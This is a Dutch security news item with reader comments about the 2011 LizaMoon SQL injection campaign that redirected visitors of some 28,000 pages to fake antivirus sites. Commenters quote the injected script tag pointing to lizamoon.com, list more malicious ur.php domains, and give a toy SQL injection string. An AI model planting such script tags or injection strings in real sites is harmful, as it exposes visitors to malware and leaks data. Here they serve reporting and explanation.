Grootschalige aanval op 28.000 webpagina's
Ruim 28.000 webpagina's zijn het doelwit van een grootschalige SQL Injectie-aanval geworden, waarbij de aanvallers kwaadaardige code injecteerden. De code zorgt ervoor dat bezoekers van de pagina naar een website worden doorgestuurd die een nep-virusscanner aanbiedt.
Onder de aangevallen pagina's bevinden zich ook enkele iTunes pagina's. Het gaat om aangeboden podcasts. Volgens beveiligingsbedrijf Websense is de RSS/XML feed die Apple gebruikt gecompromitteerd. Aangezien iTunes de script tags encodeert, werkt het script niet op de computer van bezoekers.
Reacties (13)
Ga naar:
www.google.com
Type in:
SQL
en klik op de ZOEK knop.
Oftewel gebruik je verstand eens ipv dit soort flauwekul vragen te stellen ...
www.google.com
Type in:
SQL
en klik op de ZOEK knop.
Oftewel gebruik je verstand eens ipv dit soort flauwekul vragen te stellen ...
Gaat wel heeeeel snel nu.
Ongeveer 81.300 resultaten als je naar het script zoekt in gooogle.
<script src=hxxp://lizamoon.com/ur.php></script>
Ongeveer 81.300 resultaten als je naar het script zoekt in gooogle.
<script src=hxxp://lizamoon.com/ur.php></script>
30-03-2011, 18:05 door
rodin
Door Anoniem: Wat houdt dat eigenlijk in, een SQL?
In het kort (en nogal versimpelt):
SQL is de taal waarmee opdrachten worden verstuurd naar een database. Bijvoorbeeld
geef mij alle gegevens van het nieuwe album van Lady GaGa
Deze gegevens worden dan in een mooie webpagina gestoken en naar uw browser gestuurd.Een probleem waar veel websites mee kampen is dat het mogelijk is voor hackers om hun eigen SQL opdrachten te sturen. Een hacker vraagt bijvoorbeeld het album op van 'Lady GaGa, oh en ook het wachtwoord van de beheerder graag'. Dit wordt uiteindelijk de SQL opdracht:
geef mij alle gegevens van het nieuwe album van Lady GaGa, oh en ook het
wachtwoord van de beheerder graag
Aangezien computers dom zijn, wordt deze aanvraag gewoon uitgevoerd en krijgt de hacker netjes het wachtwoord van de beheerder voor zijn neus.wachtwoord van de beheerder graag
Zo'n aanval heet 'SQL injection'.
@ rodin
Deze uitleg is zodanig versimpelD dat er geen touw aan vast te knopen is. Misschien kan iemand anders het beter uitleggen?
Deze uitleg is zodanig versimpelD dat er geen touw aan vast te knopen is. Misschien kan iemand anders het beter uitleggen?
Dan haal je toch gewoon Lady Gaga van de server af? Probleem opgelost!
31-03-2011, 07:51 door
Syzygy
Maar hij vraagt wat SQL is :
Quote WIKI: SQL (Structured Query Language) is een ANSI/ISO-standaardtaal voor een relationeel 'database management systeem' (DBMS). Het is een gestandaardiseerde taal die gebruikt kan worden voor taken zoals het bevragen en het aanpassen van gegevens in een relationele databank. SQL kan met vrijwel alle moderne relationele databankproducten worden gebruikt.
Om het voorbeeld van boven nog even te verduidelijken:
Stel je hebt een database met klanten gegevens (denk daarbij even aan een tabel zoals je in Excel maakt bijvoorbeeld).
Daar in staan gegevens van klanten (in kolommen en regels) waaronder de kolommen : Achternaam -Voornaam - Adres - Huisnummer - Postcode -Woonplaats - Land
Onder Achternaam vind je dan alle achternamen van alle klanten , onder Adres de bijbehorende adressen etc.
Als nu een applicatie (bijvoorbeeld een softwarepakket dat stickers voor de post wil afdrukken) die informatie nodig heeft dan "praat" deze in SQL code tegen die Database om zo de benodigde gegevens op te halen.
Voorbeeld; je wil bovenstaande gegevens uit de Tabel genaamd "KLANTEN" halen :
SELECT Voornaam, Achternaam , Adres, Huisnummer, Postcode,Woonplaats, Land FROM Klanten
Dus je vraagt de inhoud van de kolommen: Voornaam, Achternaam , Adres, Huisnummer, Postcode,Woonplaats, Land uit de tabel "Klanten" te halen.
Die zin noemen ze dus een "SQL Statement".
Op deze manier kun je ook een Database (Tabel) vullen of aanpassen.
Basis SQL is niet moeilijk om te leren.
Met gebruik van Cursors en zo wordt het wat ingewikkelder
Quote WIKI: SQL (Structured Query Language) is een ANSI/ISO-standaardtaal voor een relationeel 'database management systeem' (DBMS). Het is een gestandaardiseerde taal die gebruikt kan worden voor taken zoals het bevragen en het aanpassen van gegevens in een relationele databank. SQL kan met vrijwel alle moderne relationele databankproducten worden gebruikt.
Om het voorbeeld van boven nog even te verduidelijken:
Stel je hebt een database met klanten gegevens (denk daarbij even aan een tabel zoals je in Excel maakt bijvoorbeeld).
Daar in staan gegevens van klanten (in kolommen en regels) waaronder de kolommen : Achternaam -Voornaam - Adres - Huisnummer - Postcode -Woonplaats - Land
Onder Achternaam vind je dan alle achternamen van alle klanten , onder Adres de bijbehorende adressen etc.
Als nu een applicatie (bijvoorbeeld een softwarepakket dat stickers voor de post wil afdrukken) die informatie nodig heeft dan "praat" deze in SQL code tegen die Database om zo de benodigde gegevens op te halen.
Voorbeeld; je wil bovenstaande gegevens uit de Tabel genaamd "KLANTEN" halen :
SELECT Voornaam, Achternaam , Adres, Huisnummer, Postcode,Woonplaats, Land FROM Klanten
Dus je vraagt de inhoud van de kolommen: Voornaam, Achternaam , Adres, Huisnummer, Postcode,Woonplaats, Land uit de tabel "Klanten" te halen.
Die zin noemen ze dus een "SQL Statement".
Op deze manier kun je ook een Database (Tabel) vullen of aanpassen.
Basis SQL is niet moeilijk om te leren.
Met gebruik van Cursors en zo wordt het wat ingewikkelder
31-03-2011, 08:13 door
jaapd
Zo'n hack kan in het eenvoudigste geval door b.v. in het naamveld in te typen:
Jaap"; select * from password;
en als het beroerd genoeg geprogrammeerd wordt zie je de wachtwoorden langskomen.
Jaap"; select * from password;
en als het beroerd genoeg geprogrammeerd wordt zie je de wachtwoorden langskomen.
01-04-2011, 00:36 door
Bitwiper
18. zo simpel is simyo
"Bestellen </title><script src=http://lizamoon.com/ur.php></script>, Inloggen </title><script src=http://lizamoon.com/ur.php></script> ..."
faq.simyo.nl/
Nog een paar NL sites: www.vrijzinnigen.nl, www.tuinplant.nl, www.relatiegeschenk.nl, www.adverterenisgratis.nl."Bestellen </title><script src=http://lizamoon.com/ur.php></script>, Inloggen </title><script src=http://lizamoon.com/ur.php></script> ..."
faq.simyo.nl/
Naast verwijzingen naar lizamoon.com zie ik ook:
hxxp://google-stats48.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://general-st.info/ur.php
hxxp://online-guest.info/ur.php
hxxp://system-stats.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://mol-stats.info/ur.php
hxxp://ave-stats.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://online-stats201.info/ur.php
hxxp://social-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://world-stats598.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://general-st.info/ur.php
hxxp://online-guest.info/ur.php
hxxp://system-stats.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://mol-stats.info/ur.php
hxxp://ave-stats.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://online-stats201.info/ur.php
hxxp://social-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://world-stats598.info/ur.php
hxxp://t6ryt56.info/ur.php
"Oftewel gebruik je verstand eens ipv dit soort flauwekul vragen te stellen ..."
Niet iedereen hier heeft verstand van zaken als SQL. Wat dat betreft is eerder jouw reactie nogal flauw te noemen. Misschien zou het aardig zijn indien de redactie zo'n term linkt naar de WikiPedia entry over SQL.
[admin] Bedankt, is inderdaad handig [/admin]
Niet iedereen hier heeft verstand van zaken als SQL. Wat dat betreft is eerder jouw reactie nogal flauw te noemen. Misschien zou het aardig zijn indien de redactie zo'n term linkt naar de WikiPedia entry over SQL.
[admin] Bedankt, is inderdaad handig [/admin]
01-04-2011, 17:00 door
[Account Verwijderd]
[Verwijderd]
@anoniem
Iemand neemt de moeite om jou uit te leggen hoe SQL grofweg in elkaar steekt en jij hebt daar kritiek op, omdat het niet duidelijk genoeg is? Is de uitleg van hoe je Google moet gebruiken ook niet duidelijk genoeg? Blijkbaar weet je dat er een Wikipedia pagina bestaat, dus waarom moet admin tijd besteden om een linken te maken? (dat zou namelijk dan voor alle gebruikelijke computertermen moeten en niet alleen die "anoniem" niet begrijpt)
Misschien zijn sommige dingen niet in een reactie uit te leggen heb je daar al over nagedacht. Je kunt ook naar de bibliotheek, daar zijn boeken vol geschreven over SQL en ja, er is waarschijnlijk ook een SQL voor Dummies.
Ik weet niet hoe oud je bent, maar je bent nooit te oud om het volgende te leren: in de computer wereld is het onbeleefd om alles te vragen. Wanneer Google niet helpt, dan kun je een vraag stellen en vaak worden er dan alleen tips gegeven. Dit is niet gemeen of onbeleefd, want als je naar aanleiding van tips zelf ontdekt hoe een systeem werkt, dan begrijp je het systeem ook echt.
Tell me and I will forget
Show me and I may remember
Involve and I will understand
Vandaar nu een tip over SQL om je te "involven", kijk eens naar databases (zoals Microsoft Access) en dynamische websites (in PHP definitie niet die van Javascript). Daar wordt SQL veel voor gebruikt. Het is een computertaal die databases aanspreekt.
Iemand neemt de moeite om jou uit te leggen hoe SQL grofweg in elkaar steekt en jij hebt daar kritiek op, omdat het niet duidelijk genoeg is? Is de uitleg van hoe je Google moet gebruiken ook niet duidelijk genoeg? Blijkbaar weet je dat er een Wikipedia pagina bestaat, dus waarom moet admin tijd besteden om een linken te maken? (dat zou namelijk dan voor alle gebruikelijke computertermen moeten en niet alleen die "anoniem" niet begrijpt)
Misschien zijn sommige dingen niet in een reactie uit te leggen heb je daar al over nagedacht. Je kunt ook naar de bibliotheek, daar zijn boeken vol geschreven over SQL en ja, er is waarschijnlijk ook een SQL voor Dummies.
Ik weet niet hoe oud je bent, maar je bent nooit te oud om het volgende te leren: in de computer wereld is het onbeleefd om alles te vragen. Wanneer Google niet helpt, dan kun je een vraag stellen en vaak worden er dan alleen tips gegeven. Dit is niet gemeen of onbeleefd, want als je naar aanleiding van tips zelf ontdekt hoe een systeem werkt, dan begrijp je het systeem ook echt.
Tell me and I will forget
Show me and I may remember
Involve and I will understand
Vandaar nu een tip over SQL om je te "involven", kijk eens naar databases (zoals Microsoft Access) en dynamische websites (in PHP definitie niet die van Javascript). Daar wordt SQL veel voor gebruikt. Het is een computertaal die databases aanspreekt.
05-04-2011, 09:50 door
[Account Verwijderd]
[Verwijderd]
Reageren
Deze posting is gelocked. Reageren is niet meer mogelijk.
Junior DevOps Engineer
Certified Secure is op zoek naar een Junior DevOps Engineer. Deze functie is een stuk interessanter dan de term doet vermoeden! Om jou als potentiële nieuwe collega meteen te laten zien wat we doen hebben we speciaal voor jou een selectie gemaakt van een aantal leuke security challenges. Are you ready for a challenge?
Cybersecurity Trainer / Streamer
Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.
